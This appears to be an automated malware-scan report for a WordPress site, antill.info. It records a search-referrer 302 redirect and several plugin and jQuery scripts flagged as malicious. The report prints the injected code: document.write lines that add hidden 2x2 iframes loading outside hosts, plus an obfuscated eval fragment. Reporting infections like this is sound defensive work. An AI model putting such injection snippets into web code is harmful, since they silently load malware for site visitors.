Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://antill.info/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: antill.info Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 04 Sep 2014 19:31:18 GMT Location: http://habboigratis.altervista.org/ohin.html?h=768843 Server: Apache Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://antill.info/ | 200 OK Content-Length: 59345 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://prospinalinc.com/ehin.html?i=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?i=768843> | ||
http://antill.info/wp-includes/js/jquery/jquery.js?ver=1.7.2 | 200 OK Content-Length: 95215 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); (function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}func Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> | ||
http://antill.info/wp-content/plugins/fancy-box/jquery.fancybox.js?ver=1.2.6 | 200 OK Content-Length: 10036 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); ;eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String. document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> | ||
http://antill.info/wp-content/plugins/fancy-box/jquery.easing.js?ver=1.3 | 200 OK Content-Length: 8611 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'ease } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> | ||
http://maps.google.com/maps/api/js?sensor=true&ver=3 | 200 OK Content-Length: 5042 Content-Type: text/javascript | clean |
http://antill.info/wp-content/plugins/pronamic-google-maps/js/site.js?ver=3.4.1 | 200 OK Content-Length: 3372 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/sm-booking-form/js/jquery-1.3.2.min.js | 200 OK Content-Length: 57276 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/sm-booking-form/js/jquery-ui-1.8.1.custom.min.js | 200 OK Content-Length: 200846 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/sm-booking-form/js/sm-script.js | 200 OK Content-Length: 14048 Content-Type: application/x-javascript | clean |
http://antill.info/wp-content/plugins/contact-form-7/jquery.form.js?ver=2.52 | 200 OK Content-Length: 23086 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); ;(function($) { $.fn.ajaxSubmit = function(options) { if (!this.length) { log('ajaxSubmit: skipping submit proces var msg = '[jquery.form] ' + Array.prototype.join.call(arguments,''); if (window.console && window.console.log) { window.console.log(msg); } else if (window.opera && window.opera.postError) { window.opera.postError(msg); } } }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://prospinalinc.com/ehin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://prospinalinc.com/ehin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> | ||
http://antill.info/wp-content/plugins/contact-form-7/scripts.js?ver=2.4.4 | 200 OK Content-Length: 6316 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843></iframe>'); (function($) { $(function() { try { if (typeof _wpcf7 == 'undefined' || _wpcf7 $(this).find('span.wpcf7-not-valid-tip').remove(); $(this).find('img.ajax-loader').css({ visibility: 'hidden' }); }); }; })(jQuery); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html></iframe>'); Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://habboigratis.altervista.org/ohin.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://habboigratis.altervista.org/ohin.html?j=768843> Hidden iFrame found. size: 2x2 src: http://offtherunwayhairstudio.com/ahsu.html <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://offtherunwayhairstudio.com/ahsu.html> Hidden iFrame found. size: 2x2 src: http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://arlingtoncosmeticandimplantdentistry.com/ocsn.html?j=768843> | ||
http://pskovdachnik.in/scripts/swf.js | 500 Can't connect to pskovdachnik.in:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain | clean |
http://pskovdachnik.in/test404page.js | 500 Can't connect to pskovdachnik.in:80 (Bad hostname) Content-Length: 162 Content-Type: text/plain | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=antill.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://antill.info/
Result: antill.info is not infected or malware details are not published yet.
Result: antill.info is not infected or malware details are not published yet.